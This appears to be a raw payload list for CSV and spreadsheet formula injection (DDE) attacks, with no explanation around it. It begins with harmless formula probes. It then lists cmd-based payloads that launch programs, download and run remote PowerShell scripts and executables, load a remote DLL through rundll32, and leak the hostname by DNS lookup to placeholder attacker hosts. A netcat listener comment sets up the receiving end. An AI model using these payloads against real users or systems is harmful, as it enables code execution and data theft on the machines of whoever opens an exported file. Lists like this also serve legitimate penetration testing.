=NOW()
=SUM(1,1)
=DDE("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget {domain}/shell.exe)'!A0
=cmd|'/c rundll32.exe \\{ip}\3\2\1.dll,0'!_xlbgnm.A1
=WEBSERVICE(“http://{domain}”)
=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString("http://{domain}/shell.ps1");

# nc -vulp 53 on {domain}
=CMD|’/c for /f "delims=" %a in ('hostname') do nslookup %a.{domain} ’|!A0 
=CMD|’/c powershell nslookup {domain}’|!A1
